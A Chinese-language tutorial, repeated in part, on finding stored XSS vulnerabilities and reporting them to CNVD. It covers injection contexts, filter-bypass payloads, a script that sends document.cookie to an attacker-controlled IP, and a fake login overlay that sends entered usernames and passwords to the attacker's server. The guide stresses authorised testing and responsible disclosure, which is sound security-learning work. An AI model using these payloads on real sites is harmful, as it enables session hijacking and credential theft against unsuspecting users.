1. 从零到一理解通用漏洞与存储XSS的实战价值很多刚接触网络安全的朋友一听到“挖掘通用漏洞”、“提交CNVD”就觉得这是高手才能做的事门槛高不可攀。其实不然很多安全漏洞的发现过程本身就有一套可学习、可复现的方法论。今天我就以一个非常经典且适合新手入门的漏洞类型——存储型XSS跨站脚本攻击为例手把手带你走一遍从发现、利用到最终整理提交的全过程。我们这次的重点不仅仅是找到一处可以弹窗的XSS而是将其升级为一次“XSS钓鱼”攻击的模拟以此来证明漏洞的实际危害从而提升漏洞报告的价值和通过率。为什么是存储型XSS因为它危害大、影响持久。与反射型XSS需要诱骗用户点击特定链接不同存储型XSS的恶意脚本会被保存到服务器端比如数据库、评论、留言、个人资料等任何后续访问相关页面的用户都会自动中招相当于在网站上埋下了一颗“地雷”。而“XSS钓鱼”则是利用这颗地雷窃取用户的登录凭证如Cookie、诱导用户执行敏感操作如转账、修改密码是黑产常用的手段。能证明XSS可以用于钓鱼就充分说明了漏洞的严重性这比你单纯提交一个alert(1)的弹窗要有说服力得多。那么CNVD国家信息安全漏洞共享平台又是什么你可以把它理解为一个由国家权威机构运营的漏洞收集与发布平台。向CNVD提交高质量的通用漏洞即影响多个厂商或产品的漏洞通过审核后可以获得相应的证书和编号这对于在校学生积累实战经验、求职者丰富简历、乃至安全研究人员获得行业认可都有不小的帮助。我们的目标就是找到这样一个有广泛影响的存储XSS点并完成一次完整的漏洞挖掘与报告实践。2. 前期准备思维、工具与目标筛选2.1 核心思路与法律边界在开始之前我们必须划清一条绝对不能逾越的红线所有测试必须在获得明确授权的范围内进行或者针对自己拥有完全控制权的资产如个人博客、测试靶场。未经授权对任何网站进行渗透测试是违法行为。对于新手我强烈建议从以下几个合法途径开始在线漏洞测试平台如 DVWA、bWAPP、WebGoat、Pikachu等。这些是专门为学习安全技术搭建的含有各种漏洞的合法靶场。开源项目/程序在GitHub等平台寻找一些有知名度的开源CMS、博客系统、论坛程序。在自己的本地环境或VPS上搭建进行测试。一旦发现漏洞可以向开源社区负责任地披露这也是安全研究的重要部分。厂商的众测计划一些互联网公司设有“漏洞悬赏计划”Bug Bounty Program在计划规则内测试和提交漏洞是合法且可能有奖励的。我们的核心思路是“由点到面”。先在一个可控的环境如靶场里彻底掌握存储型XSS的注入点寻找、payload构造、利用方式。然后将这套方法应用于对开源项目的代码审计或安全测试中寻找可能存在的通用性问题。2.2 工具清单新手必备三件套工欲善其事必先利其器。你不需要一开始就弄一大堆复杂的工具下面这三样足以支撑你完成初期的学习和探索浏览器与开发者工具这是你最核心的“武器”。Chrome或Edge的开发者工具F12打开要熟练使用特别是“元素”Elements和“控制台”Console面板。“元素”面板可以查看和实时编辑网页HTML帮助你分析页面结构寻找输入输出点。“控制台”可以执行JavaScript用于测试payload和调试。Burp Suite Community Edition社区版这是一个功能强大的HTTP代理工具。它能拦截、查看、修改你和网站之间所有的HTTP/HTTPS请求与响应。对于测试XSS至关重要因为你可以通过它修改提交的参数插入payload并观察服务器的响应。社区版对于学习完全够用。一个简单的HTTP服务器用于接收XSS钓鱼获取到的数据。Python就能轻松搞定。在命令行输入python3 -m http.server 8000就能在当前目录启动一个监听8000端口的HTTP服务器。当你的XSS payload成功执行并向这个地址发送数据时你就能在终端看到接收到的信息。2.3 如何选择有潜力的测试目标如果你决定从开源项目入手如何筛选目标能提高成功率呢关注流行度与历史漏洞在GitHub上找一些Star数较多但又不是巨无霸级别的项目。用“CMS”、“blog”、“forum”等关键词搜索。可以顺便在历史Issue或安全公告里搜索“XSS”、“security”看看该项目过去是否曝出过类似问题这往往意味着代码中可能存在同源的安全隐患。选择用户交互功能多的模块存储型XSS高发于需要用户输入并展示给其他用户的地方。优先关注用户评论系统、留言板、文章/帖子编辑尤其是支持富文本或Markdown的、个人资料编辑昵称、签名、头像链接、站内信、文件上传文件名展示等。从简单功能入手不要一开始就去啃复杂的核心功能。从一个简单的“联系我们”表单、一个评论框开始测试。理解数据从输入到存储再到展示的完整流程。注意在整个学习和测试过程中请务必在虚拟机或独立的测试环境中进行避免对生产环境造成任何影响。心态上要保持“研究”和“学习”的目的而非“攻击”。3. 深入原理存储型XSS的注入与防御绕过3.1 漏洞产生的根本原因存储型XSS产生的链条非常清晰输入 - 存储 - 输出。漏洞就出现在其中一个或多个环节没有进行充分的安全处理。输入环节网站提供了一个允许用户输入内容的接口如表单。这个输入本应是纯文本或受控的格式如Markdown但程序没有对输入内容进行严格的过滤或验证。存储环节程序将用户输入的内容原封不动或经过不安全的处理如错误的过滤后存入数据库或文件。输出环节当其他用户访问展示这些内容的页面时程序从存储中读取数据并直接将其嵌入到HTML页面中返回给浏览器。如果数据中含有JavaScript代码浏览器就会将其当作页面的一部分执行。关键点在于“直接嵌入”。安全的做法是在输出时将用户数据中的特殊字符如,,,,进行HTML实体转义例如转成lt;。如果这一步没做或没做好漏洞就产生了。3.2 常见注入点与Payload构造你需要像侦探一样寻找数据流入HTML上下文的位置。常见的注入上下文有HTML标签内div用户输入点/div。如果输入点是/divscriptalert(1)/scriptdiv就可能闭合原有标签并插入新脚本。HTML标签属性内input value用户输入点或img src用户输入点。这里需要先闭合引号和标签例如输入 onmouseoveralert(1)最终变成input value onmouseoveralert(1)onmouseover事件就被注入。JavaScript代码段内scriptvar userInfo 用户输入点;/script。这里需要先闭合单引号和语句例如输入; alert(1);//最终变成var userInfo ; alert(1);//;。基础的Payload示例弹窗测试scriptalert(document.domain)/script最基础但容易被过滤利用HTML事件 onfocusalert(1) autofocus在input框内利用标签属性img srcx onerroralert(1)图片加载失败时触发伪协议a hrefjavascript:alert(1)点击/a需要用户点击3.3 绕过常见过滤与WAF的技巧现代网站多少都有一些防护直接使用script弹窗很可能失败。这时就需要一些绕过技巧大小写混淆ScRiPtalert(1)/sCrIpT有些简单的过滤只匹配全小写。标签属性分割利用空格、换行符(\n)、制表符(\t)或/来分割属性绕过对完整属性的匹配。img srcx onerror\nalert(1)。使用非显性事件或标签除了onerror还有onload、onmouseenter、onfocus等。除了img、script还可以尝试svg、iframe、details等标签的onload或ontoggle事件。编码绕过对payload进行HTML实体编码或JS编码。例如服务器端可能解码一次。你可以输入img srcx onerror#97;#108;#101;#114;#116;#40;#49;#41;alert(1)的十进制HTML实体。或者利用JavaScript的String.fromCharCode函数scripteval(String.fromCharCode(97,108,101,114,116,40,49,41))/script。利用解析差异浏览器HTML解析器非常“宽容”。例如img srcxοnerrοralert(1)使用反引号代替引号在某些情况下也能执行。或者img/srcx onerroralert(1)属性间不加空格。试探性测试先输入一些特殊字符组合如然后查看页面源代码看它们是如何被处理的。是被删除了被转义了还是原样输出这能帮你判断过滤逻辑。实操心得不要盲目尝试复杂的payload。先从最简单的测试开始观察输出。如果尖括号被转义或删除再尝试事件处理器如果引号被处理尝试不用引号的写法。逐步升级你的payload复杂度。Burp Suite的Repeater功能非常适合这种反复修改和测试。4. 从弹窗到钓鱼构造有杀伤力的XSS利用证明一个XSS漏洞的危害弹窗alert只是第一步。我们要展示它如何被用于真实的攻击——钓鱼窃取Cookie。4.1 搭建数据接收端首先我们需要一个地方来接收被盗取的数据。如前所述用Python启动一个简易HTTP服务器python3 -m http.server 8000运行后它会在本机0.0.0.0:8000监听。确保你的测试环境靶场能访问到这台机器的IP地址。如果是本地靶场如DVWA用127.0.0.1或localhost即可。4.2 编写窃取Cookie的Payload一个典型的窃取Cookie的XSS Payload如下scriptvar img new Image(); img.src http://你的IP地址:8000/steal?cookie encodeURIComponent(document.cookie);/script逐行解释var img new Image();创建一个隐藏的Image对象。这种方式发送请求比较隐蔽不会跳转页面或产生明显的网络加载痕迹。img.src http://...设置图片的源地址。实际上我们并不是要加载图片而是利用浏览器访问src属性时会发起一个GET请求的特性。encodeURIComponent(document.cookie)document.cookie获取当前页面的所有Cookie。encodeURIComponent函数对Cookie字符串进行URL编码防止特殊字符如分号;破坏请求格式。整个Payload的作用是当受害者浏览器加载并执行这段脚本时它会自动向你的服务器http://你的IP地址:8000发起一个GET请求并将Cookie作为参数附在URL后面。4.3 构造钓鱼登录表单窃取Cookie通常针对已登录的会话。更进一步我们可以伪造一个登录弹窗诱骗用户直接输入用户名和密码。script // 创建一个全屏遮罩层 var overlay document.createElement(div); overlay.style position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.7);z-index:9999;; // 创建一个伪造的登录框 var loginBox document.createElement(div); loginBox.style position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:30px;border-radius:10px;z-index:10000;; loginBox.innerHTML h3会话已过期请重新登录/h3form idfakeForminput typetext nameuser placeholder用户名brinput typepassword namepass placeholder密码brbutton typesubmit登录/button/form; // 将元素添加到页面 document.body.appendChild(overlay); document.body.appendChild(loginBox); // 拦截表单提交窃取凭证并发送到我们的服务器 document.getElementById(fakeForm).onsubmit function(e) { e.preventDefault(); // 阻止表单默认提交行为 var user this.user.value; var pass this.pass.value; var img new Image(); img.src http://你的IP地址:8000/phish?user encodeURIComponent(user) pass encodeURIComponent(pass); // 可选提交后显示“登录成功”的假提示然后移除弹窗 alert(登录成功); document.body.removeChild(overlay); document.body.removeChild(loginBox); return false; }; /script这个Payload会直接在页面上覆盖一个逼真的登录弹窗用户很难察觉是伪造的。一旦输入并提交凭证就会被发送到攻击者的服务器。4.4 实战注入与验证假设我们在一个测试靶场的评论框里找到了存储型XSS注入点。将上述钓鱼Payload窃取Cookie或伪造登录表单填入评论内容。提交评论。以另一个用户或清空Cookie后的身份访问该评论页面。观察效果是否出现了伪造的登录框或者页面有无异常行为如快速跳转查看你的Python HTTP服务器终端是否收到了带有Cookie或账号密码的HTTP请求记录。记录请求示例127.0.0.1 - - [日期时间] GET /steal?cookiePHPSESSIDabc123;%20usernameadmin HTTP/1.1 200 -这证明漏洞利用成功我们成功窃取了会话Cookie。注意事项在真实漏洞报告中切勿直接使用真实攻击的Payload。你应该用无害的方式证明漏洞的可利用性。例如可以弹窗显示document.cookie的内容或者向一个你自己控制的、公开的请求测试网站如http://httpbin.org/get发送一个不包含真实敏感信息的测试请求以此证明“存在数据外泄通道”。在报告中说明“该漏洞可被用于窃取用户Cookie、进行钓鱼登录等攻击”即可。这是负责任的漏洞披露伦理。5. 漏洞挖掘实战流程与记录5.1 系统性测试步骤一次完整的存储型XSS挖掘可以遵循以下步骤目标功能点定位选择一个用户输入点如“发表评论”、“编辑签名”、“上传文件命名”。基础探测输入一组测试字符img srcx onerroralert(1)。提交后立即查看页面源代码CtrlU搜索你输入的这串字符看它被放置在HTML的哪个位置是否被过滤或转义。上下文分析如果它在div标签内部尝试闭合标签。如果它在HTML属性值里如value”你的输入”尝试先闭合引号然后添加事件处理器。如果它在JavaScript字符串中如var a’你的输入’尝试闭合引号和语句。Payload构造与测试根据上下文构造相应的Payload进行测试。使用Burp Suite的Repeater模块可以方便地修改请求、重放、观察响应。利用验证当找到一个能执行JS的注入点后构造一个无害的证明性Payload。例如img srcx onerroralert(document.domain)。弹窗显示当前域名证明漏洞存在且可执行任意JS。危害验证如前所述构造一个向外部服务器发送非敏感测试数据的Payload证明存在数据外泄风险。例如img srcx onerrorvar inew Image;i.srchttp://httpbin.org/get?testfrom_xss。然后去httpbin.org查看请求记录。影响范围评估这个注入点存储的数据会被哪些页面加载是所有用户都能看到还是仅限特定用户评估漏洞的影响面。5.2 使用Burp Suite辅助测试Burp Suite能极大提升效率代理拦截配置浏览器代理指向Burp默认127.0.0.1:8080开启拦截Intercept on。在浏览器提交表单时Burp会截获请求。修改参数在拦截到的请求中找到包含用户输入的参数如commenthello将其值修改为你的XSS测试Payload。重放与对比使用“Repeater”模块。将拦截到的请求发送到Repeater可以反复修改参数、发送请求并直观地对比不同Payload对应的服务器响应快速判断过滤规则。扫描探测Burp的主动扫描器Active Scanner可以自动进行一些基础的XSS测试对于发现潜在注入点有帮助但绝不能完全依赖它手动测试和理解上下文才是关键。5.3 完整漏洞报告撰写要点当你确认了一个通用性漏洞例如在某个开源CMS的评论模块中发现并准备向CNVD或开源社区报告时报告需要清晰、专业、可复现。一份合格的漏洞报告应包含漏洞标题简明扼要如“[XX CMS] 版本 X.X 评论功能存在存储型跨站脚本漏洞”。漏洞类型存储型XSS。影响版本明确受影响的软件版本号。漏洞描述简要说明漏洞存在的功能模块及原因。复现步骤环境搭建XX CMS X.X版本PHP 7.4MySQL 5.7。操作路径以管理员/用户身份登录 - 进入文章发布页面 - 在评论框输入以下Payload...提交后访问文章详情页观察结果。 步骤必须详细到让任何技术人员都能按照描述复现漏洞证明截图1在评论框输入Payload“img srcx onerroralert(document.domain)。截图2提交后访问页面触发弹窗显示域名“localhost”。可选截图3利用漏洞向httpbin.org发送测试请求的证明。漏洞危害阐述该漏洞可导致攻击者在用户浏览器中执行任意JS代码进而窃取Cookie、伪造用户身份、进行钓鱼攻击、篡改页面内容等。修复建议在输出用户数据到HTML页面时进行正确的HTML实体编码。建议使用安全的输出函数或模板引擎的自动转义功能。对用户输入进行严格的类型、长度和内容过滤白名单原则。联系方式你的邮箱。实操心得截图是报告的灵魂。务必包含“输入Payload”和“漏洞触发效果”的完整同屏截图最好浏览器地址栏也可见。对于CNVD提交他们非常看重复现步骤的清晰度和漏洞证明的明确性。模糊的描述会导致审核周期变长甚至被忽略。6. 常见问题、排查技巧与深度思考6.1 遇到问题如何排查问题现象可能原因排查思路输入Payload后页面显示空白或错误。1. Payload包含特殊字符被后端拦截。 2. 服务器脚本执行错误。1. 使用Burp查看服务器返回的原始HTTP响应看是否有错误信息。 2. 尝试简化Payload比如先只输入一个单引号‘看是否被过滤。页面源代码中看不到我输入的Payload。1. 输入被后端完全过滤或删除。 2. 输出位置不在当前查看的页面如异步加载。1. 检查Burp拦截的响应体确认Payload是否在HTTP响应中。 2. 使用浏览器开发者工具的“网络”Network面板查看所有XHR/Fetch请求Payload可能通过AJAX动态加载。Payload在源代码中可见但就是不执行。1. 内容被放在了不会执行JS的上下文中如textarea内部。 2. 存在内容安全策略CSP限制。1. 仔细检查Payload所在的HTML上下文。是不是在script标签的字符串里或者在HTML注释里 2. 按F12打开控制台查看是否有CSP违规的错误信息。CSP会阻止内联脚本执行。弹窗成功但想进一步利用如发请求失败。1. 浏览器同源策略CORS限制。 2. 页面HTTPS但你的接收服务器是HTTP混合内容被阻止。1. 在控制台查看网络请求是否被阻止并查看错误信息。 2. 尝试使用更简单的数据外泄方式如document.locationhttp://yourserver/?document.cookie会跳转较明显。或者确保你的接收服务器也支持HTTPS。6.2 关于CNVD提交的几点深度思考什么是“通用漏洞”CNVD更倾向于收录影响多个厂商或广泛使用产品的漏洞。一个自己写的、只有一个人访问的个人网站存在XSS这不算“通用”。但一个下载量过万的开源博客系统、一个用户量庞大的CMS的某个功能存在XSS这就具备了通用性。在提交时要强调受影响产品的广泛性和版本范围。漏洞的危害证明要“恰到好处”。如前所述证明到“可执行任意代码”和“存在数据外泄风险”即可。切勿为了证明危害而真正去窃取测试环境的数据或进行破坏性操作。在报告中描述潜在危害如“可导致用户Cookie被盗进而被劫持会话”是必要的。关注漏洞的利用前提。有些存储型XSS可能需要高级别权限如管理员才能注入但所有用户都会受影响。有些则是普通用户即可注入。在报告中要写清楚“利用条件”这会影响漏洞的评分和严重等级。持续学习与积累。第一个漏洞总是最难的。从靶场开始逐步过渡到真实世界的开源软件。多阅读别人的漏洞分析报告如Seebug、CNVD官网已公开的漏洞详情学习他们的挖掘思路和报告写法。加入一些安全社区与他人交流。挖掘漏洞的过程本质上是一个“理解应用如何工作”和“寻找逻辑意外”的过程。存储型XSS作为Web安全的经典课题掌握了它你就打开了理解客户端安全、浏览器安全、前后端交互安全的一扇大门。这条路需要耐心、细致的观察力和不断试错的精神。当你提交的第一个漏洞被确认并收录时那种成就感会是对你所有努力的最佳回报。记住保持合法合规的初心专注于技术本身这份热爱会带你走得更远。
存储型XSS漏洞挖掘实战:从原理到CNVD提交的完整指南
1. 从零到一理解通用漏洞与存储XSS的实战价值很多刚接触网络安全的朋友一听到“挖掘通用漏洞”、“提交CNVD”就觉得这是高手才能做的事门槛高不可攀。其实不然很多安全漏洞的发现过程本身就有一套可学习、可复现的方法论。今天我就以一个非常经典且适合新手入门的漏洞类型——存储型XSS跨站脚本攻击为例手把手带你走一遍从发现、利用到最终整理提交的全过程。我们这次的重点不仅仅是找到一处可以弹窗的XSS而是将其升级为一次“XSS钓鱼”攻击的模拟以此来证明漏洞的实际危害从而提升漏洞报告的价值和通过率。为什么是存储型XSS因为它危害大、影响持久。与反射型XSS需要诱骗用户点击特定链接不同存储型XSS的恶意脚本会被保存到服务器端比如数据库、评论、留言、个人资料等任何后续访问相关页面的用户都会自动中招相当于在网站上埋下了一颗“地雷”。而“XSS钓鱼”则是利用这颗地雷窃取用户的登录凭证如Cookie、诱导用户执行敏感操作如转账、修改密码是黑产常用的手段。能证明XSS可以用于钓鱼就充分说明了漏洞的严重性这比你单纯提交一个alert(1)的弹窗要有说服力得多。那么CNVD国家信息安全漏洞共享平台又是什么你可以把它理解为一个由国家权威机构运营的漏洞收集与发布平台。向CNVD提交高质量的通用漏洞即影响多个厂商或产品的漏洞通过审核后可以获得相应的证书和编号这对于在校学生积累实战经验、求职者丰富简历、乃至安全研究人员获得行业认可都有不小的帮助。我们的目标就是找到这样一个有广泛影响的存储XSS点并完成一次完整的漏洞挖掘与报告实践。2. 前期准备思维、工具与目标筛选2.1 核心思路与法律边界在开始之前我们必须划清一条绝对不能逾越的红线所有测试必须在获得明确授权的范围内进行或者针对自己拥有完全控制权的资产如个人博客、测试靶场。未经授权对任何网站进行渗透测试是违法行为。对于新手我强烈建议从以下几个合法途径开始在线漏洞测试平台如 DVWA、bWAPP、WebGoat、Pikachu等。这些是专门为学习安全技术搭建的含有各种漏洞的合法靶场。开源项目/程序在GitHub等平台寻找一些有知名度的开源CMS、博客系统、论坛程序。在自己的本地环境或VPS上搭建进行测试。一旦发现漏洞可以向开源社区负责任地披露这也是安全研究的重要部分。厂商的众测计划一些互联网公司设有“漏洞悬赏计划”Bug Bounty Program在计划规则内测试和提交漏洞是合法且可能有奖励的。我们的核心思路是“由点到面”。先在一个可控的环境如靶场里彻底掌握存储型XSS的注入点寻找、payload构造、利用方式。然后将这套方法应用于对开源项目的代码审计或安全测试中寻找可能存在的通用性问题。2.2 工具清单新手必备三件套工欲善其事必先利其器。你不需要一开始就弄一大堆复杂的工具下面这三样足以支撑你完成初期的学习和探索浏览器与开发者工具这是你最核心的“武器”。Chrome或Edge的开发者工具F12打开要熟练使用特别是“元素”Elements和“控制台”Console面板。“元素”面板可以查看和实时编辑网页HTML帮助你分析页面结构寻找输入输出点。“控制台”可以执行JavaScript用于测试payload和调试。Burp Suite Community Edition社区版这是一个功能强大的HTTP代理工具。它能拦截、查看、修改你和网站之间所有的HTTP/HTTPS请求与响应。对于测试XSS至关重要因为你可以通过它修改提交的参数插入payload并观察服务器的响应。社区版对于学习完全够用。一个简单的HTTP服务器用于接收XSS钓鱼获取到的数据。Python就能轻松搞定。在命令行输入python3 -m http.server 8000就能在当前目录启动一个监听8000端口的HTTP服务器。当你的XSS payload成功执行并向这个地址发送数据时你就能在终端看到接收到的信息。2.3 如何选择有潜力的测试目标如果你决定从开源项目入手如何筛选目标能提高成功率呢关注流行度与历史漏洞在GitHub上找一些Star数较多但又不是巨无霸级别的项目。用“CMS”、“blog”、“forum”等关键词搜索。可以顺便在历史Issue或安全公告里搜索“XSS”、“security”看看该项目过去是否曝出过类似问题这往往意味着代码中可能存在同源的安全隐患。选择用户交互功能多的模块存储型XSS高发于需要用户输入并展示给其他用户的地方。优先关注用户评论系统、留言板、文章/帖子编辑尤其是支持富文本或Markdown的、个人资料编辑昵称、签名、头像链接、站内信、文件上传文件名展示等。从简单功能入手不要一开始就去啃复杂的核心功能。从一个简单的“联系我们”表单、一个评论框开始测试。理解数据从输入到存储再到展示的完整流程。注意在整个学习和测试过程中请务必在虚拟机或独立的测试环境中进行避免对生产环境造成任何影响。心态上要保持“研究”和“学习”的目的而非“攻击”。3. 深入原理存储型XSS的注入与防御绕过3.1 漏洞产生的根本原因存储型XSS产生的链条非常清晰输入 - 存储 - 输出。漏洞就出现在其中一个或多个环节没有进行充分的安全处理。输入环节网站提供了一个允许用户输入内容的接口如表单。这个输入本应是纯文本或受控的格式如Markdown但程序没有对输入内容进行严格的过滤或验证。存储环节程序将用户输入的内容原封不动或经过不安全的处理如错误的过滤后存入数据库或文件。输出环节当其他用户访问展示这些内容的页面时程序从存储中读取数据并直接将其嵌入到HTML页面中返回给浏览器。如果数据中含有JavaScript代码浏览器就会将其当作页面的一部分执行。关键点在于“直接嵌入”。安全的做法是在输出时将用户数据中的特殊字符如,,,,进行HTML实体转义例如转成lt;。如果这一步没做或没做好漏洞就产生了。3.2 常见注入点与Payload构造你需要像侦探一样寻找数据流入HTML上下文的位置。常见的注入上下文有HTML标签内div用户输入点/div。如果输入点是/divscriptalert(1)/scriptdiv就可能闭合原有标签并插入新脚本。HTML标签属性内input value用户输入点或img src用户输入点。这里需要先闭合引号和标签例如输入 onmouseoveralert(1)最终变成input value onmouseoveralert(1)onmouseover事件就被注入。JavaScript代码段内scriptvar userInfo 用户输入点;/script。这里需要先闭合单引号和语句例如输入; alert(1);//最终变成var userInfo ; alert(1);//;。基础的Payload示例弹窗测试scriptalert(document.domain)/script最基础但容易被过滤利用HTML事件 onfocusalert(1) autofocus在input框内利用标签属性img srcx onerroralert(1)图片加载失败时触发伪协议a hrefjavascript:alert(1)点击/a需要用户点击3.3 绕过常见过滤与WAF的技巧现代网站多少都有一些防护直接使用script弹窗很可能失败。这时就需要一些绕过技巧大小写混淆ScRiPtalert(1)/sCrIpT有些简单的过滤只匹配全小写。标签属性分割利用空格、换行符(\n)、制表符(\t)或/来分割属性绕过对完整属性的匹配。img srcx onerror\nalert(1)。使用非显性事件或标签除了onerror还有onload、onmouseenter、onfocus等。除了img、script还可以尝试svg、iframe、details等标签的onload或ontoggle事件。编码绕过对payload进行HTML实体编码或JS编码。例如服务器端可能解码一次。你可以输入img srcx onerror#97;#108;#101;#114;#116;#40;#49;#41;alert(1)的十进制HTML实体。或者利用JavaScript的String.fromCharCode函数scripteval(String.fromCharCode(97,108,101,114,116,40,49,41))/script。利用解析差异浏览器HTML解析器非常“宽容”。例如img srcxοnerrοralert(1)使用反引号代替引号在某些情况下也能执行。或者img/srcx onerroralert(1)属性间不加空格。试探性测试先输入一些特殊字符组合如然后查看页面源代码看它们是如何被处理的。是被删除了被转义了还是原样输出这能帮你判断过滤逻辑。实操心得不要盲目尝试复杂的payload。先从最简单的测试开始观察输出。如果尖括号被转义或删除再尝试事件处理器如果引号被处理尝试不用引号的写法。逐步升级你的payload复杂度。Burp Suite的Repeater功能非常适合这种反复修改和测试。4. 从弹窗到钓鱼构造有杀伤力的XSS利用证明一个XSS漏洞的危害弹窗alert只是第一步。我们要展示它如何被用于真实的攻击——钓鱼窃取Cookie。4.1 搭建数据接收端首先我们需要一个地方来接收被盗取的数据。如前所述用Python启动一个简易HTTP服务器python3 -m http.server 8000运行后它会在本机0.0.0.0:8000监听。确保你的测试环境靶场能访问到这台机器的IP地址。如果是本地靶场如DVWA用127.0.0.1或localhost即可。4.2 编写窃取Cookie的Payload一个典型的窃取Cookie的XSS Payload如下scriptvar img new Image(); img.src http://你的IP地址:8000/steal?cookie encodeURIComponent(document.cookie);/script逐行解释var img new Image();创建一个隐藏的Image对象。这种方式发送请求比较隐蔽不会跳转页面或产生明显的网络加载痕迹。img.src http://...设置图片的源地址。实际上我们并不是要加载图片而是利用浏览器访问src属性时会发起一个GET请求的特性。encodeURIComponent(document.cookie)document.cookie获取当前页面的所有Cookie。encodeURIComponent函数对Cookie字符串进行URL编码防止特殊字符如分号;破坏请求格式。整个Payload的作用是当受害者浏览器加载并执行这段脚本时它会自动向你的服务器http://你的IP地址:8000发起一个GET请求并将Cookie作为参数附在URL后面。4.3 构造钓鱼登录表单窃取Cookie通常针对已登录的会话。更进一步我们可以伪造一个登录弹窗诱骗用户直接输入用户名和密码。script // 创建一个全屏遮罩层 var overlay document.createElement(div); overlay.style position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.7);z-index:9999;; // 创建一个伪造的登录框 var loginBox document.createElement(div); loginBox.style position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:30px;border-radius:10px;z-index:10000;; loginBox.innerHTML h3会话已过期请重新登录/h3form idfakeForminput typetext nameuser placeholder用户名brinput typepassword namepass placeholder密码brbutton typesubmit登录/button/form; // 将元素添加到页面 document.body.appendChild(overlay); document.body.appendChild(loginBox); // 拦截表单提交窃取凭证并发送到我们的服务器 document.getElementById(fakeForm).onsubmit function(e) { e.preventDefault(); // 阻止表单默认提交行为 var user this.user.value; var pass this.pass.value; var img new Image(); img.src http://你的IP地址:8000/phish?user encodeURIComponent(user) pass encodeURIComponent(pass); // 可选提交后显示“登录成功”的假提示然后移除弹窗 alert(登录成功); document.body.removeChild(overlay); document.body.removeChild(loginBox); return false; }; /script这个Payload会直接在页面上覆盖一个逼真的登录弹窗用户很难察觉是伪造的。一旦输入并提交凭证就会被发送到攻击者的服务器。4.4 实战注入与验证假设我们在一个测试靶场的评论框里找到了存储型XSS注入点。将上述钓鱼Payload窃取Cookie或伪造登录表单填入评论内容。提交评论。以另一个用户或清空Cookie后的身份访问该评论页面。观察效果是否出现了伪造的登录框或者页面有无异常行为如快速跳转查看你的Python HTTP服务器终端是否收到了带有Cookie或账号密码的HTTP请求记录。记录请求示例127.0.0.1 - - [日期时间] GET /steal?cookiePHPSESSIDabc123;%20usernameadmin HTTP/1.1 200 -这证明漏洞利用成功我们成功窃取了会话Cookie。注意事项在真实漏洞报告中切勿直接使用真实攻击的Payload。你应该用无害的方式证明漏洞的可利用性。例如可以弹窗显示document.cookie的内容或者向一个你自己控制的、公开的请求测试网站如http://httpbin.org/get发送一个不包含真实敏感信息的测试请求以此证明“存在数据外泄通道”。在报告中说明“该漏洞可被用于窃取用户Cookie、进行钓鱼登录等攻击”即可。这是负责任的漏洞披露伦理。5. 漏洞挖掘实战流程与记录5.1 系统性测试步骤一次完整的存储型XSS挖掘可以遵循以下步骤目标功能点定位选择一个用户输入点如“发表评论”、“编辑签名”、“上传文件命名”。基础探测输入一组测试字符img srcx onerroralert(1)。提交后立即查看页面源代码CtrlU搜索你输入的这串字符看它被放置在HTML的哪个位置是否被过滤或转义。上下文分析如果它在div标签内部尝试闭合标签。如果它在HTML属性值里如value”你的输入”尝试先闭合引号然后添加事件处理器。如果它在JavaScript字符串中如var a’你的输入’尝试闭合引号和语句。Payload构造与测试根据上下文构造相应的Payload进行测试。使用Burp Suite的Repeater模块可以方便地修改请求、重放、观察响应。利用验证当找到一个能执行JS的注入点后构造一个无害的证明性Payload。例如img srcx onerroralert(document.domain)。弹窗显示当前域名证明漏洞存在且可执行任意JS。危害验证如前所述构造一个向外部服务器发送非敏感测试数据的Payload证明存在数据外泄风险。例如img srcx onerrorvar inew Image;i.srchttp://httpbin.org/get?testfrom_xss。然后去httpbin.org查看请求记录。影响范围评估这个注入点存储的数据会被哪些页面加载是所有用户都能看到还是仅限特定用户评估漏洞的影响面。5.2 使用Burp Suite辅助测试Burp Suite能极大提升效率代理拦截配置浏览器代理指向Burp默认127.0.0.1:8080开启拦截Intercept on。在浏览器提交表单时Burp会截获请求。修改参数在拦截到的请求中找到包含用户输入的参数如commenthello将其值修改为你的XSS测试Payload。重放与对比使用“Repeater”模块。将拦截到的请求发送到Repeater可以反复修改参数、发送请求并直观地对比不同Payload对应的服务器响应快速判断过滤规则。扫描探测Burp的主动扫描器Active Scanner可以自动进行一些基础的XSS测试对于发现潜在注入点有帮助但绝不能完全依赖它手动测试和理解上下文才是关键。5.3 完整漏洞报告撰写要点当你确认了一个通用性漏洞例如在某个开源CMS的评论模块中发现并准备向CNVD或开源社区报告时报告需要清晰、专业、可复现。一份合格的漏洞报告应包含漏洞标题简明扼要如“[XX CMS] 版本 X.X 评论功能存在存储型跨站脚本漏洞”。漏洞类型存储型XSS。影响版本明确受影响的软件版本号。漏洞描述简要说明漏洞存在的功能模块及原因。复现步骤环境搭建XX CMS X.X版本PHP 7.4MySQL 5.7。操作路径以管理员/用户身份登录 - 进入文章发布页面 - 在评论框输入以下Payload...提交后访问文章详情页观察结果。 步骤必须详细到让任何技术人员都能按照描述复现漏洞证明截图1在评论框输入Payload“img srcx onerroralert(document.domain)。截图2提交后访问页面触发弹窗显示域名“localhost”。可选截图3利用漏洞向httpbin.org发送测试请求的证明。漏洞危害阐述该漏洞可导致攻击者在用户浏览器中执行任意JS代码进而窃取Cookie、伪造用户身份、进行钓鱼攻击、篡改页面内容等。修复建议在输出用户数据到HTML页面时进行正确的HTML实体编码。建议使用安全的输出函数或模板引擎的自动转义功能。对用户输入进行严格的类型、长度和内容过滤白名单原则。联系方式你的邮箱。实操心得截图是报告的灵魂。务必包含“输入Payload”和“漏洞触发效果”的完整同屏截图最好浏览器地址栏也可见。对于CNVD提交他们非常看重复现步骤的清晰度和漏洞证明的明确性。模糊的描述会导致审核周期变长甚至被忽略。6. 常见问题、排查技巧与深度思考6.1 遇到问题如何排查问题现象可能原因排查思路输入Payload后页面显示空白或错误。1. Payload包含特殊字符被后端拦截。 2. 服务器脚本执行错误。1. 使用Burp查看服务器返回的原始HTTP响应看是否有错误信息。 2. 尝试简化Payload比如先只输入一个单引号‘看是否被过滤。页面源代码中看不到我输入的Payload。1. 输入被后端完全过滤或删除。 2. 输出位置不在当前查看的页面如异步加载。1. 检查Burp拦截的响应体确认Payload是否在HTTP响应中。 2. 使用浏览器开发者工具的“网络”Network面板查看所有XHR/Fetch请求Payload可能通过AJAX动态加载。Payload在源代码中可见但就是不执行。1. 